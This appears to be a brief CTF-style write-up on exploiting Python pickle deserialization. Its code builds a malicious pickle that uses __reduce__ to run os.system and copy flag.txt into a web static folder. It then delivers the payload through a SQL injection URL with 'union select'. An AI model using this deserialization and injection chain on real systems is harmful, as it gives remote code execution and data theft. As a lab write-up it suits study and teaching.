Skip to content

C.O.P

Exploiting Python pickles

Exploiting Python pickles

In Python, the pickle module lets you serialize and deserialize data. Essentially, this means that you can convert a Python object into a stream of bytes and then reconstruct it (including the object’s internal structure) later in a different process or environment by loading that stream of bytes.

# picke_test.py
import pickle
import base64
import os


class RCE:
    def __reduce__(self):
        cmd = ('cp flag.txt ./application/static/flag.txt')
        return os.system, (cmd,)


if __name__ == '__main__':
    pickled = pickle.dumps(RCE())
    print(base64.urlsafe_b64encode(pickled))

http://<sitename>/view/1' union select '<Malicious Pickle>

alt text

http://<Site Name>/static/flag.txt